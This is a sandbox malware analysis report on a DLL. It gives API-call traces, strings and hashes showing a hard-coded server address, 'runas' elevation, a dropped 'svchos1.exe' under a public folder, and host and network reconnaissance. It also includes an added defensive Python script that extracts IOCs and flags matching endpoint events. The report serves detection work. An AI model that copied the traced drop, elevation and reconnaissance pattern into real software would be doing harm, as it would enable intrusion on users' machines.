                                                          • String ID: -acsi$%$%$%$%$%$%$.$.$1.0$2$2$2$2$27.124.13.32$3$3$A$A$A$A$A$A$A$A$A$A$A$A$A$A$C$C$D$D$D$D$Default$E$E$E$E$F$F$F$F$G$G$G$G$Global\$I$I$K$L$L$M$M$N$P$P$R$S$S$S$S$S$S$S$S$T$V$a$a$a$a$a$a$a$a$a$b$b$c$c$c$c$c$d$d$d$g$g$g$g$g$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$n$n$n$o$o$o$open$p$p$p$p$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$v$v$v$x$y
                                                          • API String ID: 351596864-2051936253
                                                          • Opcode ID: 396c311c59b219a6e9856af48bca6b6f49ef19d76da5838c064707eedaeea6b0
                                                          • Instruction ID: 03ba51a34e947f1e7150f2c6594a6cea4c9bea9df2946d370c6041ae97ececec
                                                          • Opcode Fuzzy Hash: 396c311c59b219a6e9856af48bca6b6f49ef19d76da5838c064707eedaeea6b0
                                                          • Instruction Fuzzy Hash: DA82057050C3C0DDE332C7688848BDFBED5ABA6708F48499DE5CC4A292D7BA5648C767

Control-flow Graph (image; legend: Executed / Not Executed)
                                                          control_flow_graph 91 10014700-1001487f LoadLibraryA GetProcAddress #823 * 2 RegOpenKeyExA 92 10014881-10014894 call 10014c12 91->92 93 10014899-1001489f 91->93 119 10014c28-10014c53 #825 * 2 92->119 95 100148a5 93->95 96 100149ab-100149b7 call 10014c12 93->96 95->96 99 10014a03-10014a29 RegQueryValueExA 95->99 100 100148c2-100148ec RegQueryValueExA 95->100 101 10014ba2-10014bcd wsprintfA 95->101 102 100149a4 95->102 103 10014908-10014932 RegQueryValueExA 95->103 104 100148ac-100148b5 95->104 105 10014acc-10014b3e RegEnumValueA 95->105 106 10014bcf-10014bd4 95->106 107 10014a30-10014a72 RegEnumKeyExA 95->107 108 10014bf5-10014c0d lstrcatA 95->108 109 10014bd6 95->109 110 10014b58-10014b7b wsprintfA 95->110 111 10014b7d-10014ba0 wsprintfA 95->111 112 100149bc-100149e6 RegQueryValueExA 95->112 96->119 99->96 115 10014a2b 99->115 100->96 121 100148f2-10014906 call 10010c70 100->121 101->108 102->96 103->96 122 10014934-10014943 103->122 104->96 120 100148bb 104->120 105->96 117 10014b44-10014b4b 105->117 118 10014bdb-10014bf2 wsprintfA 106->118 107->96 116 10014a78-10014ac7 wsprintfA 107->116 109->118 110->108 111->108 112->96 114 100149e8-10014a01 wsprintfA 112->114 114->102 115->102 116->107 117->108 124 10014b51 117->124 118->108 120->96 120->99 120->100 120->101 120->103 120->106 120->108 120->109 120->110 120->111 120->112 129 10014986-100149a2 121->129 125 10014949-1001494c 122->125 124->101 124->106 124->108 124->109 124->110 124->111 126 10014980 125->126 127 1001494e-1001497e strncat * 2 strchr 125->127 126->129 127->125 129->102
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                          • #823.MFC42(?), ref: 10014763
                                                          • #823.MFC42(?,?), ref: 100147DA
                                                          • RegOpenKeyExA.KERNELBASE(00000000,1011EF78,00000000,00020019,?), ref: 1001487A
                                                            • Part of subcall function 10014C12: RegCloseKey.ADVAPI32(00000000,100149B7), ref: 10014C1C
                                                            • Part of subcall function 10014C12: RegCloseKey.ADVAPI32(?), ref: 10014C25
                                                          • #825.MFC42(?), ref: 10014C2F
                                                          • #825.MFC42(?,?), ref: 10014C38
                                                          Strings
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: same module dumps as listed for the first function above.
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823#825Close$AddressLibraryLoadOpenProc
                                                          • String ID: %-24s %-$%-24s %-15$'%','-','2','4','s',' ','%','-','1','5','s',' ','0','x','%','x','(','%','d',')',' ','','r','','n','$15s $ADVAPI32.dll$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$RegOpenKeyExA$[%s]$s %s
                                                          • API String ID: 625772149-2764046103
                                                          • Opcode ID: aee2fbfb53f9212be97810f834c78ac85ceb427a47ea468a14eb8ed47b1d2988
                                                          • Instruction ID: b9ee80f7ba0032ef2a873998b74759f7f259eced15a3b8225111e03f3ed8f019
                                                          • Opcode Fuzzy Hash: aee2fbfb53f9212be97810f834c78ac85ceb427a47ea468a14eb8ed47b1d2988
                                                          • Instruction Fuzzy Hash: 63E1A0B29005189BDB14CFA8CC84AEFB7B9FB88310F554359F61AA72D0DB759E44CB90

                                                          Control-flow Graph

                                                          APIs
                                                          • _access.MSVCRT ref: 1002141D
                                                            • Part of subcall function 100209D0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10020A10
                                                            • Part of subcall function 100209D0: CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 10020A25
                                                            • Part of subcall function 100209D0: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10020A30
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10021449
                                                          • ShellExecuteExA.SHELL32(?), ref: 10021491
                                                          • GetLastError.KERNEL32 ref: 10021497
                                                          • exit.MSVCRT ref: 100214A1
                                                          • _access.MSVCRT ref: 100214D0
                                                          • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 100214ED
                                                          • _access.MSVCRT ref: 100214F6
                                                          • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 10021507
                                                          • Sleep.KERNEL32(000003E8), ref: 1002150E
                                                          • _access.MSVCRT ref: 10021517
                                                          • Sleep.KERNELBASE(000001F4,?,?), ref: 10021526
                                                          • CreateThread.KERNELBASE(00000000,00000000,10020FD0,00000000,00000000,00000000), ref: 10021542
                                                          • CloseHandle.KERNELBASE(00000000), ref: 1002154F
                                                          • CreateThread.KERNELBASE(00000000,00000000,100211C0,00000000,00000000,00000000), ref: 10021560
                                                          • CloseHandle.KERNEL32(00000000), ref: 10021567
                                                          • Shellex.L10U7QN0CY ref: 1002157D
                                                            • Part of subcall function 1001EFD0: #823.MFC42(00000849), ref: 1001EFDF
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(27.124.13.32,00000000), ref: 1001F006
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EAFC,0000012C), ref: 1001F014
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(Default,00000260), ref: 1001F022
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1.0,00000292), ref: 1001F030
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EC82,000002B2), ref: 1001F03E
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011ECE6,00000316), ref: 1001F04C
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011ED66,00000396), ref: 1001F05A
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EE66,00000496), ref: 1001F068
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EF78,000005A8), ref: 1001F076
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EFDC,0000060C), ref: 1001F084
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011F018,00000648), ref: 1001F092
                                                          Strings
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: same module dumps as listed for the first function above.
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$_access$CloseCreateExecHandleSleepThread$#823AllocateCheckErrorExecuteFileFreeInitializeLastMembershipModuleNameShellShellexTokenexit
                                                          • String ID: 27.124.13.32$<$C:\Users\Public\Documents\MM$C:\Users\Public\Documents\MM\svchos1.exe$cmd /c md C:\Users\Public\Documents\MM$runas
                                                          • API String ID: 2771109159-2199693279
                                                          • Opcode ID: 47013249946700c5f9ea9399668bc89909b1de1377a07b2227f678a46ff069ce
                                                          • Instruction ID: cd7c039830fad82791ff8b600530d86eb936d2ebe89cd3a7d692d6b5a8a0fa87
                                                          • Opcode Fuzzy Hash: 47013249946700c5f9ea9399668bc89909b1de1377a07b2227f678a46ff069ce
                                                          • Instruction Fuzzy Hash: 1D313939640315A7F620E7B8AC81FCE3694EF947A0F540625F718FB1D0DBB4A94046A6
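
The API lists for functions 1001EFD0 (mutex, command-line switch, service start) and 10021410 (admin check, "runas" elevation, drop directory, worker threads) are where the actionable indicators of this report live. The script below is an added example written for this page; it is neither Joe Sandbox code nor code from the sample. It parses the report's own line format ("• Api.Module(args), ref: addr" and the '$'-separated "String ID" pool) into an IOC list and then matches that list against endpoint process-creation events. The trace excerpt is constructed from the lines shown above; the Sysmon-style events are constructed too, and the field names Image, CommandLine and ProcessId are assumptions.

```python
"""Added example (not Joe Sandbox code, not the sample's code): turn the
per-function API trace of this report into IOCs, then flag endpoint
process-creation events that touch them.  Inputs below are constructed."""
import ipaddress
import re
from collections import defaultdict

# "• Api.Module(arg1,arg2), ref: 1002ABCD" or "• Api.Module ref: 1002ABCD",
# optionally prefixed with "Part of subcall function XXXXXXXX:".
API_LINE = re.compile(
    r"^(?:\u2022\s*)?(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>[^\s(]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# The "String ID" line is the function's string pool, '$'-separated.
STRING_LINE = re.compile(r"^(?:\u2022\s*)?String ID:\s*(?P<pool>.*)$")
WIN_PATH = re.compile(r"^[A-Za-z]:\\[^\x00-\x1f]*$")  # drive-letter path

MUTEX_APIS = {"CreateMutexA", "CreateMutexW"}
EXEC_APIS = {"WinExec", "ShellExecuteExA", "ShellExecuteA", "CreateProcessA"}
SERVICE_APIS = {"OpenSCManagerA", "OpenServiceA", "StartServiceA"}


def classify(token):
    """Label one argument or pool string: 'ip' (routable), 'path', or None."""
    tok = token.strip()
    try:
        return "ip" if ipaddress.ip_address(tok).is_global else None
    except ValueError:
        pass
    return "path" if WIN_PATH.match(tok) else None


def parse_report(text):
    """Return sets ip/path/cmdline/behaviour plus 'calls', the ordered
    list of (api, module, args, ref) tuples found in the trace."""
    iocs = defaultdict(set)
    calls = []
    for raw in text.splitlines():
        line = raw.strip()
        s = STRING_LINE.match(line)
        if s:
            for tok in s["pool"].split("$"):
                kind = classify(tok)
                if kind:
                    iocs[kind].add(tok.strip())
                if tok.startswith("cmd "):
                    iocs["cmdline"].add(tok)
                if tok == "runas":            # ShellExecute verb: UAC prompt
                    iocs["behaviour"].add("uac-elevation-runas")
                if tok == "Global\\":         # cross-session mutex namespace
                    iocs["behaviour"].add("global-mutex-prefix")
            continue
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
        calls.append((m["api"], m["mod"], args, m["ref"]))
        if m["api"] in EXEC_APIS and args and args[0] not in ("?", "00000000"):
            iocs["cmdline"].add(args[0])      # sandbox resolved the literal command
        if m["api"] in SERVICE_APIS:
            iocs["behaviour"].add("service-start")
        if m["api"] in MUTEX_APIS:
            iocs["behaviour"].add("mutex-singleton")
        for a in args:
            kind = classify(a)
            if kind:
                iocs[kind].add(a)
    iocs["calls"] = calls
    return iocs


def match_events(iocs, events):
    """Flag events whose image is a dropped file or sits under a dropped
    directory, or whose command line is one the sample executed."""
    hits = []
    for ev in events:
        img, cmd = ev.get("Image", ""), ev.get("CommandLine", "")
        reasons = []
        if any(img.lower() == p.lower() or img.lower().startswith(p.lower() + "\\")
               for p in iocs["path"]):
            reasons.append("dropped-path")
        if any(c.lower() in cmd.lower() for c in iocs["cmdline"]):
            reasons.append("known-cmdline")
        if reasons:
            hits.append((ev.get("ProcessId"), reasons))
    return hits


# Constructed excerpt, copied from the trace lines of functions 1001EFD0 and 10021410.
SAMPLE_TRACE = r"""
• lstrcpyA.KERNEL32(27.124.13.32,00000000), ref: 1001F006
• CreateMutexA.KERNELBASE(?,00000000,00000000), ref: 1001FA43
• GetLastError.KERNEL32 ref: 1001FA52
• OpenSCManagerA.ADVAPI32(00000000,00000000,00020000), ref: 1001FB59
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 1001FB82
  • Part of subcall function 100209D0: CheckTokenMembership.ADVAPI32(00000000,?), ref: 10020A25
• ShellExecuteExA.SHELL32(?), ref: 10021491
• WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 100214ED
• CreateThread.KERNELBASE(00000000,00000000,10020FD0,00000000,00000000,00000000), ref: 10021542
• String ID: 27.124.13.32$<$C:\Users\Public\Documents\MM$C:\Users\Public\Documents\MM\svchos1.exe$cmd /c md C:\Users\Public\Documents\MM$runas
• String ID: -acsi$%$Global\$open
• String ID: C:\ProgramData\Microsoft Drive\Mark.sys$M$T$TGByte\Setup$a$e
"""

# Constructed Sysmon-style process-creation events (field names assumed).
SAMPLE_EVENTS = [
    {"ProcessId": 1204, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c md C:\Users\Public\Documents\MM"},
    {"ProcessId": 1310, "Image": r"C:\Users\Public\Documents\MM\svchos1.exe",
     "CommandLine": r"C:\Users\Public\Documents\MM\svchos1.exe"},
    {"ProcessId": 1422, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    found = parse_report(SAMPLE_TRACE)
    for kind in ("ip", "path", "cmdline", "behaviour"):
        print(f"{kind:10} {sorted(found[kind])}")
    print("hits:", match_events(found, SAMPLE_EVENTS))
```

The String ID pool is parsed as well as the API lines because that is the only place the dropped executable name (svchos1.exe) and the "runas" verb appear; the API lines alone would give you the C2 address and the mkdir command but not the file that is later launched elevated.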

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                            • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                            • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                            • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001ABCC
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC0A
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC1A
                                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC2A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC31
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC38
                                                          Strings
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: same module dumps as listed for the first function above.
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$#823lstrlen$AddressCloseCreateHandleLibraryLoadProcReadSize
                                                          • String ID: C:\ProgramData\Microsoft Drive\Mark.sys$M$T$TGByte\Setup$a$e$i$k$m$r
                                                          • API String ID: 1069036285-2757848780
                                                          • Opcode ID: ec809791d292be055727b466fa0ce1641dba220c236396e814923678bb28ca07
                                                          • Instruction ID: 22e6748c9a2becf40cddaea7510870619e651d703c90d80807b49c54875026d3
                                                          • Opcode Fuzzy Hash: ec809791d292be055727b466fa0ce1641dba220c236396e814923678bb28ca07
                                                          • Instruction Fuzzy Hash: 1B31B831108790AFE311CB28CC54B9BBBD9EBC9704F444A1CFA99573D1D7B66A04CB66

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 10021410: _access.MSVCRT ref: 1002141D
                                                          • _access.MSVCRT ref: 100214D0
                                                          • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 100214ED
                                                          • _access.MSVCRT ref: 100214F6
                                                          • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 10021507
                                                          • Sleep.KERNEL32(000003E8), ref: 1002150E
                                                          • _access.MSVCRT ref: 10021517
                                                          • Sleep.KERNELBASE(000001F4,?,?), ref: 10021526
                                                          • CreateThread.KERNELBASE(00000000,00000000,10020FD0,00000000,00000000,00000000), ref: 10021542
                                                          • CloseHandle.KERNELBASE(00000000), ref: 1002154F
                                                          • CreateThread.KERNELBASE(00000000,00000000,100211C0,00000000,00000000,00000000), ref: 10021560
                                                          • CloseHandle.KERNEL32(00000000), ref: 10021567
                                                          • Shellex.L10U7QN0CY ref: 1002157D
                                                          Strings
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: same module dumps as listed for the first function above.
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _access$CloseCreateExecHandleSleepThread$Shellex
                                                          • String ID: 27.124.13.32$C:\Users\Public\Documents\MM$cmd /c md C:\Users\Public\Documents\MM
                                                          • API String ID: 4276510029-3007588180
                                                          • Opcode ID: d1bb37949f93bbbdf33aeda2a2054d21fcfc61b33a9e68333bfe54f2a22e07a3
                                                          • Instruction ID: 3e7a1a4e7598c83f093a5e0993a406ee5a5388e5c4ebba12b8a80e490745e328
                                                          • Opcode Fuzzy Hash: d1bb37949f93bbbdf33aeda2a2054d21fcfc61b33a9e68333bfe54f2a22e07a3
                                                          • Instruction Fuzzy Hash: D611CD39780725B2F520E3B46C82FDE2544DB907A0F650672F719BF1C0DAA4BC4046AA

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,1011EF78,771B0F00,0000005C,00000000,00000000,771B0F00,1001FEC4), ref: 1002BDDE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002BDE7
                                                          • CreateThread.KERNELBASE(?,?,1002BCB0,?,?,?), ref: 1002BE15
                                                          • LoadLibraryA.KERNEL32(KERNEL32.DLL,WaitForSingleObject,?,?,?,?,?,?,?,?,?), ref: 1002BE27
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002BE2A
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 1002BE3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$CloseCreateHandleThread
                                                          • String ID: CreateEventA$KERNEL32.DLL$KERNEL32.dll$WaitForSingleObject
                                                          • API String ID: 2992130774-1666596002
                                                          • Opcode ID: 66dcb28fd48408753ecbc63a31bf9652f99330e46bd155989c14c10afc364313
                                                          • Instruction ID: 87cc892ea1759eb00eaf64f8c46fa55303ed71919323dfed3064715f6316d5fa
                                                          • Opcode Fuzzy Hash: 66dcb28fd48408753ecbc63a31bf9652f99330e46bd155989c14c10afc364313
                                                          • Instruction Fuzzy Hash: 70110C75608315AFD600DFA88C84F9BBBE8EBC8350F544A0DF698D3251C674E9058BA2

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 10020F30: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10020F42
                                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D49A3D8,1011FA70,?,?,1002152D), ref: 10020F8C
                                                          • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,?,?,1002152D), ref: 10020F93
                                                          • GetLastError.KERNEL32(?,?,1002152D), ref: 10020F9F
                                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D49A3D8,1011FA58,00000000,?,?,1002152D), ref: 10020FB2
                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP60(?,?,?,?,1002152D), ref: 10020FBD
                                                          • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,?,?,?,?,1002152D), ref: 10020FC4
                                                          Strings
                                                          • C:\Users\Public\Documents\MM\svchos1.exe, xrefs: 10020F70
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: U?$char_traits@$V?$basic_ostream@$??6std@@?endl@std@@D@std@@@0@D@std@@@1@V10@V21@@$??6?$basic_ostream@D@std@@@std@@ErrorFileLastModuleNameV01@
                                                          • String ID: C:\Users\Public\Documents\MM\svchos1.exe
                                                          • API String ID: 481592904-2345221083
                                                          • Opcode ID: f77c0b55697f030eaac147686a7c31d4908e0b1848482c375ca60604acc84bd7
                                                          • Instruction ID: ff15b68b2db02ee6112a923f0d9d03375cbf9b0eaed6c4210ff095593cf92b5b
                                                          • Opcode Fuzzy Hash: f77c0b55697f030eaac147686a7c31d4908e0b1848482c375ca60604acc84bd7
                                                          • Instruction Fuzzy Hash: 71E065B8A103106BE745A7F4AC8D99A37D8FF4450670C1A78FD0EE6161EF39D2549711

                                                          Control-flow Graph (text form)
                                                          • Block 184: 10020f30-10020f4a, calls GetModuleFileNameA; edges to 185 and 186
                                                          • Block 185: 10020f53-10020f6e, calls CopyFileA
                                                          • Block 186: 10020f4c-10020f52
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10020F42
                                                          • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10020F62
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CopyModuleName
                                                          • String ID:
                                                          • API String ID: 4108865673-0
                                                          • Opcode ID: 8b9eeeda643a368c08ce189f1b931563e6753a19753fcbcbb6e14da0ee54dd1c
                                                          • Instruction ID: 93f4a3cd88c2ae214515ddcb3b57ab60d0dfeb708720a14bb37e431ebb366a02
                                                          • Opcode Fuzzy Hash: 8b9eeeda643a368c08ce189f1b931563e6753a19753fcbcbb6e14da0ee54dd1c
                                                          • Instruction Fuzzy Hash: BCE012F95443006BF314DB58DCC6FE636A8BB80B00FC44918F79C851D0E6F59598C662

                                                          Control-flow Graph (text form)
                                                          • Block 187: 10014c12-10014c27, calls RegCloseKey twice
                                                          APIs
                                                          • RegCloseKey.ADVAPI32(00000000,100149B7), ref: 10014C1C
                                                          • RegCloseKey.ADVAPI32(?), ref: 10014C25
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 2d25b05425eaf0d76969a3d827c9af328c302ad55e3d4ae73cc7dce2a4c3e829
                                                          • Instruction ID: cb428774d1c23af65b3502e581b01568c295d1083760601ce9be51a3606d3d50
                                                          • Opcode Fuzzy Hash: 2d25b05425eaf0d76969a3d827c9af328c302ad55e3d4ae73cc7dce2a4c3e829
                                                          • Instruction Fuzzy Hash: 8BB09B759240389BDF54DB64DC449C937687B48200B050586B51CA3150C931AD808F90
                                                          APIs
                                                          • LocalAlloc.KERNEL32(00000040,00000400), ref: 1000A591
                                                          • LoadLibraryA.KERNEL32 ref: 1000A5A9
                                                          • GetProcAddress.KERNEL32(00000000,AllocateAndGetTcpExTableFromStack), ref: 1000A5C1
                                                          • GetProcAddress.KERNEL32(00000000,AllocateAndGetUdpExTableFromStack), ref: 1000A5CB
                                                          • GetProcAddress.KERNEL32(00000000,InternalGetTcpTable2), ref: 1000A5E7
                                                          • GetProcessHeap.KERNEL32(00000001), ref: 1000A602
                                                          • GetProcessHeap.KERNEL32(00000002,00000002), ref: 1000AD8C
                                                          • GetProcessHeap.KERNEL32(00000002,00000002), ref: 1000ADAD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHeapProcProcess$AllocLibraryLoadLocal
                                                          • String ID: %s:%u$*.*.*.*:*$AllocateAndGetTcpExTableFromStack$AllocateAndGetUdpExTableFromStack$CLOSE_WAIT$FIN_WAIT1$FIN_WAIT2$InternalGetTcpTable2$InternalGetUdpTableWithOwnerPid$LAST_ACK$TIME_WAIT$[TCP]$[UDP]$iphlpapi.dll
                                                          • API String ID: 370057222-305753129
                                                          • Opcode ID: 519bc66bccf35325d0b58bf220eed18991c6d328836e432961e0ea9d9299cabc
                                                          • Instruction ID: 3878becebeafeda62e551408519d1494f05c47cd3e4fb1777d1cfee609c89dcd
                                                          • Opcode Fuzzy Hash: 519bc66bccf35325d0b58bf220eed18991c6d328836e432961e0ea9d9299cabc
                                                          • Instruction Fuzzy Hash: 53A2C1766083159FC324CF28CC449ABB7E5FBC9710F554A2DF94A93281DA74ED0ACB92
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32 ref: 1002A387
                                                          • RegQueryValueExA.ADVAPI32(?,~MHz,00000000,00000000,?,?), ref: 1002A3B6
                                                          • RegCloseKey.ADVAPI32(?), ref: 1002A3C1
                                                          • GetSystemInfo.KERNEL32(?), ref: 1002A3CF
                                                          • wsprintfA.USER32 ref: 1002A3F8
                                                          • RegOpenKeyExA.ADVAPI32(80000002,00000043,00000000,00000001,?), ref: 1002A551
                                                          • RegQueryValueExA.ADVAPI32(00000001,ProcessorNameString,00000000,?,?,00000043), ref: 1002A59F
                                                          • RegCloseKey.ADVAPI32(?), ref: 1002A5EF
                                                          • GetComputerNameA.KERNEL32(?,secorPlartneC), ref: 1002A645
                                                            • Part of subcall function 1002A180: WTSQuerySessionInformationA.WTSAPI32(00000000,000000FF,00000005,?,?,?,75A38400,?), ref: 1002A19F
                                                            • Part of subcall function 1002A180: WTSFreeMemory.WTSAPI32(?,00000000,000000FF,00000005,?,?,?,75A38400,?), ref: 1002A1D0
                                                          • GetTickCount.KERNEL32 ref: 1002A65B
                                                          • wsprintfA.USER32 ref: 1002A6AB
                                                          • GetDC.USER32(00000000), ref: 1002A6B2
                                                          • GetDeviceCaps.GDI32(00000000,00000075), ref: 1002A6C3
                                                          • GetDeviceCaps.GDI32(00000000,00000076), ref: 1002A6C9
                                                          • wsprintfA.USER32 ref: 1002A6D9
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 1002A6E1
                                                          • wsprintfA.USER32 ref: 1002A705
                                                          • wsprintfA.USER32 ref: 1002A727
                                                          • wsprintfA.USER32 ref: 1002A740
                                                          • GetCommandLineA.KERNEL32 ref: 1002A745
                                                          • wsprintfA.USER32 ref: 1002A759
                                                          • GetUserNameA.ADVAPI32(?,?), ref: 1002A773
                                                          • wsprintfA.USER32 ref: 1002A807
                                                          • wsprintfA.USER32 ref: 1002A81F
                                                          • FindWindowA.USER32(?,00000000), ref: 1002A869
                                                          • GetWindowTextA.USER32(00000000,?,00000104), ref: 1002A8CA
                                                          • GetWindow.USER32(00000000,00000002), ref: 1002A9AA
                                                          • GetClassNameA.USER32(00000000,?,00000104), ref: 1002A9BC
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 1002A9DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
